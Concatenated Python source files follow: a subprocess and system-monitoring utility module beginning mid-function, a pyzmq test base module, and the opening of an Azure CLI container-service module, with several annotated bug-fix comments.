        except subprocess.TimeoutExpired as e:
            process.kill()
            if sys.platform == 'win32':
                # on Windows the child may still be writing after kill(); drain
                # the pipes and attach the partial output to the exception
                e.stdout, e.stderr = communicate(process)
            else:
                process.wait()
            # BUGFIX: previously raised a new TimeoutExpired built from the
            # local names `stdout`/`stderr`, which were never assigned because
            # communicate() raised — a guaranteed NameError masking the timeout.
            # Re-raise the original exception instead (mirrors subprocess.run).
            raise
        except:  # also handles kb interrupts
            process.kill()
            raise
        retcode = process.poll()
        if check and retcode:
            raise subprocess.CalledProcessError(retcode, process.args, output=stdout, stderr=stderr)
    return subprocess.CompletedProcess(process.args, retcode, stdout, stderr)
def as_cmd_args(*args, **kwargs):
    """Build a flat list of command-line tokens from positional and keyword args.

    Keyword items are flattened into ``key value`` pairs; falsy tokens are
    dropped from the result.

    BUGFIX: the previous single-expression version had a precedence bug —
    ``A + B if kwargs is not None else []`` parses as
    ``(A + B) if kwargs is not None else []``, so a ``None`` kwargs would have
    silently discarded *args* as well. With ``**kwargs`` the dict is never
    None, so observable behavior is unchanged; the latent branch is now correct.
    """
    tokens = [] if args is None else list(args)
    if kwargs is not None:
        tokens = tokens + flatten(kwargs.items(), flatten_tuple=True)
    return list(filter(None, tokens))
def run_cmd(cmd, *args, **kwargs):
    """Run a shell command, logging its output.

    Meta-parameters controlling the execution are passed surrounded by
    underscores (e.g. ``_timeout_=60``) so they never clash with genuine
    command-line keyword arguments; all remaining args/kwargs are flattened
    into the command line via :func:`as_cmd_args`.

    :param cmd: the command (string, or list to be flattened) to execute.
    :return: tuple ``(stdout, stderr)`` of the completed process.
    :raises subprocess.CalledProcessError: when the command exits non-zero.
    """
    # defaults for all supported meta-parameters
    params = Namespace(
        input_str=None,
        capture_output=True,
        capture_error=True,
        bufsize=-1,
        text=True,
        live_output=False, # one of (True, 'line', 'block', False)
        output_level=logging.DEBUG,
        error_level=logging.ERROR,
        shell=True,
        executable=None,
        env=None,
        preexec_fn=None,
        timeout=None,
        activity_timeout=None,
        log_level=logging.INFO,
    )
    # pop meta-params (underscored keys) out of kwargs so they are not
    # forwarded to the command line
    for k, v in params:
        kk = '_'+k+'_'
        if kk in kwargs:
            params[k] = kwargs[kk]
            del kwargs[kk]
    cmd_args = as_cmd_args(*args, **kwargs)
    full_cmd = flatten([cmd])+cmd_args
    str_cmd = ' '.join(full_cmd)
    log.log(params.log_level, "Running cmd `%s`", str_cmd)
    log.debug("Running cmd `%s` with input: %s", str_cmd, params.input_str)

    # custom communicate function: echoes the child's output live
    # (line- or block-wise) while still accumulating it for the caller
    def live_output(process, input=None, **ignored):
        mode = params.live_output
        if mode is True:
            mode = 'line'
        if input is not None:
            try:
                with process.stdin as stream:
                    stream.write(input)
            except BrokenPipeError:
                pass
            except:
                raise

        # read whatever is ready on the given pipe(s), echoing per `mode`;
        # returns one string per pipe ('' when that pipe had nothing)
        def read_pipe(pipe, timeout):
            pipes = as_list(pipe)
            ready, *_ = select.select(pipes, [], [], timeout)
            reads = [''] * len(pipes)
            for i, p in enumerate(pipes):
                if p in ready:
                    line = p.readline()
                    if mode == 'line':
                        print(re.sub(r'\n$', '', line, count=1))
                    elif mode == 'block':
                        print(line, end='')
                    reads[i] = line
            return reads if len(pipes) > 1 else reads[0]

        # iterate until both pipes return '' (the iter() sentinel), collecting
        # stdout/stderr fragments pairwise
        output, error = zip(*iter(lambda: read_pipe([process.stdout if process.stdout else 1,
                                                     process.stderr if process.stderr else 2], params.activity_timeout),
                                  ['', '']))
        print() # ensure that the log buffer is flushed at the end
        return ''.join(output), ''.join(error)

    try:
        completed = run_subprocess(str_cmd if params.shell else full_cmd,
                                   input=params.input_str,
                                   timeout=params.timeout,
                                   check=True,
                                   communicate_fn=live_output if params.live_output and params.capture_output else None,
                                   # stdin=subprocess.PIPE if params.input_str is not None else None,
                                   stdout=subprocess.PIPE if params.capture_output else None,
                                   stderr=subprocess.PIPE if params.capture_error else None,
                                   shell=params.shell,
                                   bufsize=params.bufsize,
                                   universal_newlines=params.text,
                                   executable=params.executable,
                                   env=params.env,
                                   preexec_fn=params.preexec_fn)
        if completed.stdout:
            log.log(params.output_level, completed.stdout)
        if completed.stderr:
            log.log(params.error_level, completed.stderr)
        return completed.stdout, completed.stderr
    except subprocess.CalledProcessError as e:
        # log captured output before propagating the failure
        if e.stdout:
            log.log(params.output_level, e.stdout)
        if e.stderr:
            log.log(params.error_level, e.stderr)
        # error_tail = tail(e.stderr, 25) if e.stderr else 'Unknown Error'
        # raise subprocess.SubprocessError("Error when running command `{cmd}`: {error}".format(cmd=full_cmd, error=error_tail))
        raise e
def run_script(script_path, *args, **kwargs):
    """Mark *script_path* as executable for its owner, then run it via :func:`run_cmd`."""
    os.chmod(script_path, os.stat(script_path).st_mode | stat.S_IEXEC)
    return run_cmd(script_path, *args, **kwargs)
def call_script_in_same_dir(caller_file, script_file, *args, **kwargs):
    """Run *script_file* located in the same directory as *caller_file*."""
    script_path = os.path.join(dir_of(caller_file), script_file)
    return run_script(script_path, *args, **kwargs)
def get_thread(tid=None):
    """Resolve a thread: current thread when *tid* is None, main thread when 0,
    otherwise the live thread with that ident (or None if not found)."""
    if tid is None:
        return threading.current_thread()
    if tid == 0:
        return threading.main_thread()
    return next((t for t in threading.enumerate() if t.ident == tid), None)
def get_process(pid=None):
    """Resolve a psutil Process: current process when *pid* is None, the
    parent when 0, otherwise the process with that pid (None if absent)."""
    if pid is None:
        pid = os.getpid()
    elif pid == 0:
        pid = os.getppid()
    return psutil.Process(pid) if psutil.pid_exists(pid) else None
def kill_proc_tree(pid=None, include_parent=True, timeout=None, on_terminate=None):
    """Terminate, then kill, a process and all of its descendants.

    Every process in the tree is sent SIGTERM first; after waiting up to
    *timeout* seconds, survivors are SIGKILLed. *on_terminate*, when given,
    is invoked for each process that ended within the grace period.
    """
    def _log_terminated(proc):
        log.info("Process %s terminated with exit code %s", proc, proc.returncode)
        if on_terminate is not None:
            on_terminate(proc)

    root = get_process(pid)
    victims = root.children(recursive=True)
    if include_parent:
        victims.append(root)
    for victim in victims:
        log.warning("Terminating process %s.", victim)
        victim.terminate()
    _, survivors = psutil.wait_procs(victims, timeout=timeout, callback=_log_terminated)
    for victim in survivors:
        log.warning("Killing process %s.", victim)
        victim.kill()
def call_in_subprocess(target, *args, **kwargs):
    """Execute ``target(*args, **kwargs)`` in a fresh process and return its result.

    The result (or the exception raised by *target*) is shipped back through a
    one-slot queue; exceptions are re-raised in the caller. If the child dies
    without reporting anything, a generic Exception is raised and the child's
    process tree is cleaned up.
    """
    def _runner(channel, *a, **kw):
        try:
            channel.put_nowait(target(*a, **kw))
        except BaseException as e:
            log.exception(e)
            channel.put_nowait(e)

    channel = mp.Queue(maxsize=1)
    proc = mp.Process(target=_runner, args=(channel, *args), kwargs=kwargs)
    try:
        proc.start()
        proc.join()
        outcome = channel.get_nowait()
        if isinstance(outcome, BaseException):
            raise outcome
        return outcome
    except queue.Empty:
        raise Exception("Subprocess running {} died abruptly.".format(target.__name__))
    except BaseException:
        try:
            kill_proc_tree(proc.pid)
        except:
            pass
        raise
def system_cores():
    """Return the number of logical CPU cores reported by psutil."""
    return psutil.cpu_count()
def system_memory_mb():
    """Return system RAM statistics: total/available in MB plus used percentage."""
    mem = psutil.virtual_memory()
    return Namespace(
        total=to_mb(mem.total),
        available=to_mb(mem.available),
        used_percentage=mem.percent,
    )
def system_volume_mb(root="/"):
    """Return disk usage for the volume holding *root*: total/free/used in MB
    plus used percentage."""
    usage = psutil.disk_usage(root)
    return Namespace(
        total=to_mb(usage.total),
        free=to_mb(usage.free),
        used=to_mb(usage.used),
        used_percentage=usage.percent,
    )
def signal_handler(sig, handler):
    """Install *handler* as a one-shot handler for signal *sig*.

    After the first delivery the previously-installed handler (or the default
    action when there was none) is restored, so *handler* fires at most once
    per registration.

    :param sig: a signal number from the :mod:`signal` module.
    :param handler: zero-argument callable invoked when the signal arrives.
    """
    previous = None

    def _one_shot(signum, frame):
        try:
            handler()
        finally:
            # hand the signal back to whatever was registered before us
            signal.signal(sig, previous or signal.SIG_DFL)

    previous = signal.signal(sig, _one_shot)
def raise_in_thread(thread_id, exc):
    """Asynchronously raise an exception in another thread (CPython only).

    :param thread_id: the thread in which the exception will be raised.
    :param exc: the exception to raise in the thread: it can be an exception class or an instance.
    :raises ValueError: if no thread with that id exists.
    :raises SystemError: if the interpreter modified more than one thread state.
    """
    import ctypes
    tid = ctypes.c_long(thread_id)
    # PyThreadState_SetAsyncExc only accepts a class, so an exception *instance*
    # is wrapped in a throwaway subclass whose __init__ re-applies the message
    exc_class = exc if inspect.isclass(exc) else type(exc.__class__.__name__, (exc.__class__,), dict(
        __init__=lambda s: super(s.__class__, s).__init__(str(exc))
    ))
    exc_class = ctypes.py_object(exc_class)
    ret = ctypes.pythonapi.PyThreadState_SetAsyncExc(tid, exc_class)
    if ret == 0:
        # no thread state matched the given id
        raise ValueError(f"Nonexistent thread {thread_id}")
    elif ret > 1:
        # more than one thread state was touched: undo the damage and bail out
        ctypes.pythonapi.PyThreadState_SetAsyncExc(tid, None)
        raise SystemError(f"Failed raising exception in thread {thread_id}")
class InterruptTimeout(Timeout):
    """
    A :class:`Timeout` implementation that can send a signal to the interrupted thread or process,
    or raise an exception in the thread (works only for thread interruption)
    if the passed signal is an exception class or instance.
    """
    def __init__(self, timeout_secs, message=None, log_level=logging.WARNING,
                 interrupt='thread', sig=signal.SIGINT, ident=None, before_interrupt=None):
        # callback executed by the Timeout machinery when the deadline expires
        def interruption():
            log.log(log_level, self.message)
            if before_interrupt is not None:
                before_interrupt()
            # keep trying until __exit__ signals completion via interrupt_event
            while not self.interrupt_event.is_set():
                try:
                    if interrupt == 'thread':
                        if isinstance(self.sig, (type(None), BaseException)):
                            # raise an exception asynchronously inside the target thread
                            exc = TimeoutError(self.message) if self.sig is None else self.sig
                            raise_in_thread(self.ident, exc)
                        else:
                            # _thread.interrupt_main()
                            signal.pthread_kill(self.ident, self.sig)
                    elif interrupt == 'process':
                        os.kill(self.ident, self.sig)
                except Exception:
                    raise
                finally:
                    self.interrupt_event.wait(1)  # retry every second if interruption didn't work
        super().__init__(timeout_secs, on_timeout=interruption)
        if interrupt not in ['thread', 'process']:
            raise ValueError("`interrupt` value should be one of ['thread', 'process'].")
        # resolve the target thread/process up-front so failures happen at construction
        tp = get_thread(ident) if interrupt == 'thread' else get_process(ident)
        if tp is None:
            raise ValueError(f"no {interrupt} with id {ident}")
        if message is None:
            id = f"ident={tp.ident}" if isinstance(tp, threading.Thread) else f"pid={tp.pid}"
            self.message = f"Interrupting {interrupt} {tp.name} [{id}] after {timeout_secs}s timeout."
        else:
            self.message = message
        self.ident = tp.ident if tp is not None else None
        # when sig is an exception class, instantiate it with the message now
        self.sig = sig(self.message) if inspect.isclass(sig) and BaseException in inspect.getmro(sig) else sig
        self.interrupt_event = threading.Event()
    def __exit__(self, exc_type, exc_val, exc_tb):
        super().__exit__(exc_type, exc_val, exc_tb)
        self.interrupt_event.set()  # stop the interruption retry loop
        if self.timed_out:
            if isinstance(self.sig, BaseException):
                raise self.sig
            elif self.sig is None:
                # swallow the async TimeoutError that was raised inside the block
                return True
class Monitoring:
    """Context manager running a periodic ``_check_state`` in a background thread.

    A ``frequency_seconds`` of zero (or less) disables the background thread
    entirely. Subclasses override :meth:`_check_state` to emit one sample.
    """

    def __init__(self, name=None, frequency_seconds=300, check_on_exit=False, thread_prefix="monitoring_"):
        self._exec = None
        self._name = name or os.getpid()
        self._frequency = frequency_seconds
        self._thread_prefix = thread_prefix
        self._interrupt = threading.Event()
        self._check_on_exit = check_on_exit

    def __enter__(self):
        if self._frequency > 0:
            self._interrupt.clear()
            self._exec = ThreadPoolExecutor(max_workers=1, thread_name_prefix=self._thread_prefix)
            self._exec.submit(self._monitor)
        return self

    def __exit__(self, *args):
        if self._exec is None:
            return
        self._interrupt.set()
        self._exec.shutdown(wait=False)
        if self._check_on_exit:
            self._check_state()
        self._exec = None

    def _monitor(self):
        # loop until __exit__ sets the interrupt flag, pausing _frequency
        # seconds between samples; errors are logged but never kill the loop
        while not self._interrupt.is_set():
            try:
                self._check_state()
            except Exception as e:
                log.exception(e)
            finally:
                self._interrupt.wait(self._frequency)

    def _check_state(self):
        """Hook for subclasses: emit one monitoring sample."""
        pass
class CPUMonitoring(Monitoring):
    """Periodically log CPU utilization; verbosity>0 logs per-mode CPU times."""

    def __init__(self, name=None, frequency_seconds=300, check_on_exit=False,
                 use_interval=False, per_cpu=False, verbosity=0, log_level=logging.INFO):
        # with use_interval, sampling is delegated to psutil's own interval
        # argument, so the monitor loop itself runs with zero frequency
        super().__init__(name=name,
                         frequency_seconds=0 if use_interval else frequency_seconds,
                         check_on_exit=check_on_exit,
                         thread_prefix="cpu_monitoring_")
        self._interval = frequency_seconds if use_interval else None
        self._per_cpu = per_cpu
        self._verbosity = verbosity
        self._log_level = log_level

    def _check_state(self):
        if self._verbosity == 0:
            usage = psutil.cpu_percent(interval=self._interval, percpu=self._per_cpu)
            log.log(self._log_level, "[%s] CPU Utilization: %s%%", self._name, usage)
        elif self._verbosity > 0:
            usage = psutil.cpu_times_percent(interval=self._interval, percpu=self._per_cpu)
            log.log(self._log_level, "[%s] CPU Utilization (in percent):\n%s", self._name, usage)
class MemoryMonitoring(Monitoring):
    """Periodically log RAM usage; verbosity selects percent, MB or raw bytes."""

    def __init__(self, name=None, frequency_seconds=300, check_on_exit=False,
                 verbosity=0, log_level=logging.INFO):
        super().__init__(name=name,
                         frequency_seconds=frequency_seconds,
                         check_on_exit=check_on_exit,
                         thread_prefix="memory_monitoring_")
        self._verbosity = verbosity
        self._log_level = log_level

    def _check_state(self):
        if self._verbosity == 0:
            log.log(self._log_level, "[%s] Memory Usage: %s%%", self._name,
                    system_memory_mb().used_percentage)
        elif self._verbosity == 1:
            log.log(self._log_level, "[%s] Memory Usage (in MB): %s", self._name,
                    system_memory_mb())
        elif self._verbosity > 1:
            log.log(self._log_level, "[%s] Memory Usage (in Bytes): %s", self._name,
                    psutil.virtual_memory())
class VolumeMonitoring(Monitoring):
    """Periodically log disk usage for *root*; verbosity selects percent, MB or bytes."""

    def __init__(self, name=None, frequency_seconds=300, check_on_exit=False, root="/",
                 verbosity=0, log_level=logging.INFO):
        super().__init__(name=name,
                         frequency_seconds=frequency_seconds,
                         check_on_exit=check_on_exit,
                         thread_prefix="volume_monitoring_")
        self._root = root
        self._verbosity = verbosity
        self._log_level = log_level

    def _check_state(self):
        if self._verbosity == 0:
            log.log(self._log_level, "[%s] Disk Usage: %s%%", self._name,
                    system_volume_mb(self._root).used_percentage)
        elif self._verbosity == 1:
            log.log(self._log_level, "[%s] Disk Usage (in MB): %s", self._name,
                    system_volume_mb(self._root))
        elif self._verbosity > 1:
            log.log(self._log_level, "[%s] Disk Usage (in Bytes): %s", self._name,
                    psutil.disk_usage(self._root))
class OSMonitoring(Monitoring):
    """Aggregates CPU, memory and volume monitors behind one Monitoring interface."""

    def __init__(self, name=None, frequency_seconds=300, check_on_exit=False,
                 statistics=('cpu', 'memory', 'volume'), verbosity=0, log_level=logging.INFO):
        super().__init__(name=name, frequency_seconds=frequency_seconds, check_on_exit=check_on_exit)
        common = dict(name=name, frequency_seconds=frequency_seconds,
                      verbosity=verbosity, log_level=log_level)
        self.monitors = []
        if 'cpu' in statistics:
            self.monitors.append(CPUMonitoring(**common))
        if 'memory' in statistics:
            self.monitors.append(MemoryMonitoring(**common))
        if 'volume' in statistics:
            self.monitors.append(VolumeMonitoring(**common))

    def _check_state(self):
        # one sample from each enabled monitor per cycle
        for monitor in self.monitors:
            monitor._check_state()
class MemoryProfiler:
    """Context manager measuring the memory footprint change of a code block.

    Usage::

        with MemoryProfiler() as prof:
            ...
        stats = prof.usage()
    """

    def __init__(self, process=None, enabled=True):
        """
        :param process: psutil Process to profile; defaults to the current process.
        :param enabled: when False, the profiler is a no-op and usage() returns None.
        """
        # BUGFIX: the previous signature used `process=psutil.Process()`, a
        # default argument evaluated once at import time — it ran psutil during
        # module import and pinned every profiler to the importing process.
        # Resolving the default lazily per instance is backward-compatible.
        self.ps = (process if process is not None else psutil.Process()) if enabled else None
        self.before_mem = None
        self.after_mem = None

    def __enter__(self):
        if self.ps is not None:
            self.before_mem = self.ps.memory_full_info()
        return self

    def __exit__(self, *args):
        if self.ps is not None:
            self.after_mem = self.ps.memory_full_info()

    def usage(self):
        """Return memory usage in MB (process/resident/virtual, with deltas
        since ``__enter__``); None when profiling is disabled."""
        if self.ps is None:
            return None
        mem = self.after_mem if self.after_mem is not None else self.ps.memory_full_info()
        return Namespace(
            process_diff=to_mb(mem.uss - self.before_mem.uss),
            process=to_mb(mem.uss),
            resident_diff=to_mb(mem.rss - self.before_mem.rss),
            resident=to_mb(mem.rss),
            virtual_diff=to_mb(mem.vms - self.before_mem.vms),
            virtual=to_mb(mem.vms)
        )
def obj_size(o):
    """Approximate size of *o* in bytes: 0 for None, ``nbytes`` for
    numpy-like objects, else ``sys.getsizeof``."""
    if o is None:
        return 0
    # numpy arrays (and friends) report their buffer size via `nbytes`
    nbytes = getattr(o, 'nbytes', None)
    return nbytes if nbytes is not None else sys.getsizeof(o, -1)
def profile(logger=log, log_level=None, duration=True, memory=True):
    """Decorator logging a function's execution time and memory deltas.

    Profiling only happens when *logger* is enabled for *log_level* (which
    defaults, lazily, to TRACE when available, else DEBUG); otherwise the
    wrapped function is called directly with no profiling overhead.
    """
    def decorator(fn):
        @wraps(fn)
        def profiler(*args, **kwargs):
            nonlocal log_level
            # resolve the default level lazily, on first call
            log_level = log_level or (logging.TRACE if hasattr(logging, 'TRACE') else logging.DEBUG)
            if not logger.isEnabledFor(log_level):
                return fn(*args, **kwargs)
            with Timer(enabled=duration) as t, MemoryProfiler(enabled=memory) as m:
                ret = fn(*args, **kwargs)
            name = fn_name(fn)
            if duration:
                logger.log(log_level, "[PROFILING] `%s` executed in %.3fs.", name, t.duration)
            if memory:
                ret_size = obj_size(ret)
                if ret_size > 0:
                    logger.log(log_level, "[PROFILING] `%s` returned object size: %.3f MB.", name, to_mb(ret_size))
                mem = m.usage()
                logger.log(log_level, "[PROFILING] `%s` memory change; process: %+.2f MB/%.2f MB, resident: %+.2f MB/%.2f MB, virtual: %+.2f MB/%.2f MB.",
                           name, mem.process_diff, mem.process, mem.resident_diff, mem.resident, mem.virtual_diff, mem.virtual)
            return ret
        return profiler
    return decorator
|
__init__.py | # Copyright (c) PyZMQ Developers.
# Distributed under the terms of the Modified BSD License.
import sys
import time
from threading import Thread
from unittest import TestCase
try:
from unittest import SkipTest
except ImportError:
from unittest2 import SkipTest
from pytest import mark
import zmq
from zmq.utils import jsonapi
try:
import gevent
from zmq import green as gzmq
have_gevent = True
except ImportError:
have_gevent = False
# True when running under the PyPy interpreter (some tests are CPython-only)
PYPY = 'PyPy' in sys.version
#-----------------------------------------------------------------------------
# skip decorators (directly from unittest)
#-----------------------------------------------------------------------------
# identity decorator, used as a no-op placeholder when a skip does not apply
_id = lambda x: x
# pytest skip marks shared across the zmq test suite
skip_pypy = mark.skipif(PYPY, reason="Doesn't work on PyPy")
require_zmq_4 = mark.skipif(zmq.zmq_version_info() < (4,), reason="requires zmq >= 4")
#-----------------------------------------------------------------------------
# Base test class
#-----------------------------------------------------------------------------
class BaseZMQTestCase(TestCase):
    """Base class for zmq test cases: manages a shared Context and created sockets."""
    green = False
    # seconds to wait for context termination before declaring the test leaked sockets
    teardown_timeout = 10

    @property
    def Context(self):
        """The Context class under test (gevent-green variant when ``green``)."""
        if self.green:
            return gzmq.Context
        else:
            return zmq.Context

    def socket(self, socket_type):
        """Create a socket on the shared context, registered for cleanup in tearDown."""
        s = self.context.socket(socket_type)
        self.sockets.append(s)
        return s

    def setUp(self):
        super(BaseZMQTestCase, self).setUp()
        if self.green and not have_gevent:
            raise SkipTest("requires gevent")
        self.context = self.Context.instance()
        self.sockets = []

    def tearDown(self):
        contexts = set([self.context])
        while self.sockets:
            sock = self.sockets.pop()
            contexts.add(sock.context)  # in case additional contexts are created
            sock.close(0)
        for ctx in contexts:
            # terminate in a daemon thread so a hung term cannot hang the suite
            t = Thread(target=ctx.term)
            t.daemon = True
            t.start()
            t.join(timeout=self.teardown_timeout)
            if t.is_alive():
                # reset Context.instance, so the failure to term doesn't corrupt subsequent tests
                zmq.sugar.context.Context._instance = None
                raise RuntimeError("context could not terminate, open sockets likely remain in test")
        super(BaseZMQTestCase, self).tearDown()

    def create_bound_pair(self, type1=zmq.PAIR, type2=zmq.PAIR, interface='tcp://127.0.0.1'):
        """Create a bound socket pair using a random port.

        BUGFIX: the interface previously defaulted to 'tcp://10.0.0.7', a
        machine-specific LAN address that fails to bind on any other host;
        the loopback address is the portable default.
        """
        s1 = self.context.socket(type1)
        s1.setsockopt(zmq.LINGER, 0)
        port = s1.bind_to_random_port(interface)
        s2 = self.context.socket(type2)
        s2.setsockopt(zmq.LINGER, 0)
        s2.connect('%s:%s' % (interface, port))
        self.sockets.extend([s1, s2])
        return s1, s2

    def ping_pong(self, s1, s2, msg):
        """Send *msg* on s1, echo it back via s2, and return what s1 receives."""
        s1.send(msg)
        msg2 = s2.recv()
        s2.send(msg2)
        msg3 = s1.recv()
        return msg3

    def ping_pong_json(self, s1, s2, o):
        """Round-trip *o* as JSON through the socket pair."""
        if jsonapi.jsonmod is None:
            raise SkipTest("No json library")
        s1.send_json(o)
        o2 = s2.recv_json()
        s2.send_json(o2)
        o3 = s1.recv_json()
        return o3

    def ping_pong_pyobj(self, s1, s2, o):
        """Round-trip *o* as a pickled object through the socket pair."""
        s1.send_pyobj(o)
        o2 = s2.recv_pyobj()
        s2.send_pyobj(o2)
        o3 = s1.recv_pyobj()
        return o3

    def assertRaisesErrno(self, errno, func, *args, **kwargs):
        """Assert that *func* raises a ZMQError carrying the given errno."""
        try:
            func(*args, **kwargs)
        except zmq.ZMQError as e:
            self.assertEqual(e.errno, errno, "wrong error raised, expected '%s' \
got '%s'" % (zmq.ZMQError(errno), zmq.ZMQError(e.errno)))
        else:
            self.fail("Function did not raise any error")

    def _select_recv(self, multipart, socket, **kwargs):
        """call recv[_multipart] in a way that raises if there is nothing to receive"""
        if zmq.zmq_version_info() >= (3, 1, 0):
            # zmq 3.1 has a bug, where poll can return false positives,
            # so we wait a little bit just in case
            # See LIBZMQ-280 on JIRA
            time.sleep(0.1)
        r, w, x = zmq.select([socket], [], [], timeout=kwargs.pop('timeout', 5))
        assert len(r) > 0, "Should have received a message"
        kwargs['flags'] = zmq.DONTWAIT | kwargs.get('flags', 0)
        recv = socket.recv_multipart if multipart else socket.recv
        return recv(**kwargs)

    def recv(self, socket, **kwargs):
        """call recv in a way that raises if there is nothing to receive"""
        return self._select_recv(False, socket, **kwargs)

    def recv_multipart(self, socket, **kwargs):
        """call recv_multipart in a way that raises if there is nothing to receive"""
        return self._select_recv(True, socket, **kwargs)
class PollZMQTestCase(BaseZMQTestCase):
    """Base class for poll-related test cases (no extra behavior beyond the base yet)."""
    pass
class GreenTest:
    """Mixin for making green versions of test classes"""
    green = True
    # seconds allowed for gevent-based context termination in tearDown
    teardown_timeout = 10
    def assertRaisesErrno(self, errno, func, *args, **kwargs):
        # EAGAIN-based assertions are skipped in green mode
        if errno == zmq.EAGAIN:
            raise SkipTest("Skipping because we're green.")
        try:
            func(*args, **kwargs)
        except zmq.ZMQError:
            e = sys.exc_info()[1]
            self.assertEqual(e.errno, errno, "wrong error raised, expected '%s' \
got '%s'" % (zmq.ZMQError(errno), zmq.ZMQError(e.errno)))
        else:
            self.fail("Function did not raise any error")
    def tearDown(self):
        # close all sockets created by the test, then terminate their contexts
        # cooperatively via gevent greenlets
        contexts = set([self.context])
        while self.sockets:
            sock = self.sockets.pop()
            contexts.add(sock.context) # in case additional contexts are created
            sock.close()
        try:
            gevent.joinall(
                [gevent.spawn(ctx.term) for ctx in contexts],
                timeout=self.teardown_timeout,
                raise_error=True,
            )
        except gevent.Timeout:
            raise RuntimeError("context could not terminate, open sockets likely remain in test")
    def skip_green(self):
        raise SkipTest("Skipping because we are green")
def skip_green(f):
    """Decorator that skips the wrapped test method when the test class is green.

    :param f: a test method taking ``self`` as its first argument.
    :return: a wrapper raising SkipTest when ``self.green`` is truthy,
        otherwise delegating to *f*.
    """
    from functools import wraps

    # IMPROVEMENT: the original wrapper did not use functools.wraps, so the
    # decorated test lost its __name__/__doc__ (confusing test reports).
    @wraps(f)
    def skipping_test(self, *args, **kwargs):
        if self.green:
            raise SkipTest("Skipping because we are green")
        return f(self, *args, **kwargs)
    return skipping_test
|
custom.py | # --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import colorama
import base64
import binascii
import datetime
import errno
import io
import json
import os
import os.path
import platform
import random
import re
import shutil
import ssl
import stat
import string
import subprocess
import sys
import tempfile
import threading
import time
import uuid
import webbrowser
import zipfile
from distutils.version import StrictVersion
from math import isnan
from six.moves.urllib.request import urlopen # pylint: disable=import-error
from six.moves.urllib.error import URLError # pylint: disable=import-error
# pylint: disable=import-error
import yaml
import dateutil.parser
from dateutil.relativedelta import relativedelta
from knack.log import get_logger
from knack.util import CLIError
from knack.prompting import prompt_pass, NoTTYException, prompt_y_n
from msrestazure.azure_exceptions import CloudError
import requests
# pylint: disable=no-name-in-module,import-error
from azure.cli.command_modules.acs import acs_client, proxy
from azure.cli.command_modules.acs._params import regions_in_preview, regions_in_prod
from azure.cli.core.api import get_config_dir
from azure.cli.core.azclierror import (ResourceNotFoundError,
ClientRequestError,
ArgumentUsageError,
InvalidArgumentValueError,
MutuallyExclusiveArgumentError,
ValidationError,
UnauthorizedError)
from azure.cli.core._profile import Profile
from azure.cli.core.profiles import ResourceType
from azure.cli.core.commands.client_factory import get_mgmt_service_client, get_subscription_id
from azure.cli.core.keys import is_valid_ssh_rsa_public_key
from azure.cli.core.util import in_cloud_console, shell_safe_json_parse, truncate_text, sdk_no_wait
from azure.cli.core.commands import LongRunningOperation
from azure.graphrbac.models import (ApplicationCreateParameters,
ApplicationUpdateParameters,
PasswordCredential,
KeyCredential,
ServicePrincipalCreateParameters,
GetObjectsParameters,
ResourceAccess, RequiredResourceAccess)
from azure.mgmt.containerservice.models import ContainerServiceOrchestratorTypes
from ._client_factory import cf_container_services
from ._client_factory import cf_resource_groups
from ._client_factory import get_auth_management_client
from ._client_factory import get_graph_rbac_management_client
from ._client_factory import cf_resources
from ._client_factory import get_resource_by_name
from ._client_factory import cf_container_registry_service
from ._client_factory import cf_agent_pools
from ._client_factory import get_msi_client
from ._helpers import (_populate_api_server_access_profile, _set_vm_set_type, _set_outbound_type,
_parse_comma_separated_list)
from ._loadbalancer import (set_load_balancer_sku, is_load_balancer_profile_provided,
update_load_balancer_profile, create_load_balancer_profile)
from ._consts import CONST_SCALE_SET_PRIORITY_REGULAR, CONST_SCALE_SET_PRIORITY_SPOT, CONST_SPOT_EVICTION_POLICY_DELETE
from ._consts import CONST_HTTP_APPLICATION_ROUTING_ADDON_NAME
from ._consts import CONST_MONITORING_ADDON_NAME
from ._consts import CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID
from ._consts import CONST_VIRTUAL_NODE_ADDON_NAME
from ._consts import CONST_VIRTUAL_NODE_SUBNET_NAME
from ._consts import CONST_KUBE_DASHBOARD_ADDON_NAME
from ._consts import CONST_AZURE_POLICY_ADDON_NAME
from ._consts import CONST_INGRESS_APPGW_ADDON_NAME
from ._consts import CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID, CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME
from ._consts import CONST_INGRESS_APPGW_SUBNET_CIDR, CONST_INGRESS_APPGW_SUBNET_ID
from ._consts import CONST_INGRESS_APPGW_WATCH_NAMESPACE
from ._consts import CONST_CONFCOM_ADDON_NAME, CONST_ACC_SGX_QUOTE_HELPER_ENABLED
from ._consts import ADDONS
from ._consts import CONST_CANIPULL_IMAGE
from ._consts import CONST_PRIVATE_DNS_ZONE_SYSTEM
from ._consts import CONST_MANAGED_IDENTITY_OPERATOR_ROLE, CONST_MANAGED_IDENTITY_OPERATOR_ROLE_ID
logger = get_logger(__name__)
# pylint:disable=too-many-lines,unused-argument
def which(binary):
    """Locate *binary* on the system PATH.

    On Windows the ``.exe`` suffix is appended to the name before searching
    (previous behavior, preserved).

    IMPROVEMENTS: guards against an unset PATH (previously an AttributeError),
    uses ``os.pathsep`` instead of hard-coded ';'/':', and drops the redundant
    ``os.path.exists`` check (``isfile`` implies it).

    :param binary: base name of the executable to find.
    :return: full path of the first matching executable, or None.
    """
    path_var = os.getenv('PATH') or ''
    if platform.system() == 'Windows':
        binary = binary + '.exe'
    for part in path_var.split(os.pathsep):
        bin_path = os.path.join(part, binary)
        if os.path.isfile(bin_path) and os.access(bin_path, os.X_OK):
            return bin_path
    return None
def wait_then_open(url):
    """
    Waits for a bit then opens a URL. Useful for waiting for a proxy to come up, and then open the URL.
    """
    # Poll the URL for up to ~9 attempts, sleeping 1s after each failure.
    # BUGFIX: the original `break` sat after the except handler, so the loop
    # exited after the first iteration regardless of the outcome and never
    # actually waited for the endpoint; break only on a successful request.
    for _ in range(1, 10):
        try:
            urlopen(url, context=_ssl_context())
            break
        except URLError:
            time.sleep(1)
    webbrowser.open_new_tab(url)
def wait_then_open_async(url):
    """
    Spawns a daemon thread that waits for a bit then opens a URL.
    """
    # BUGFIX: Thread args must be a sequence; the original passed the set
    # literal ({url}), which only worked by accident for a single element
    # and breaks ordering guarantees for anything more.
    t = threading.Thread(target=wait_then_open, args=(url,))
    t.daemon = True
    t.start()
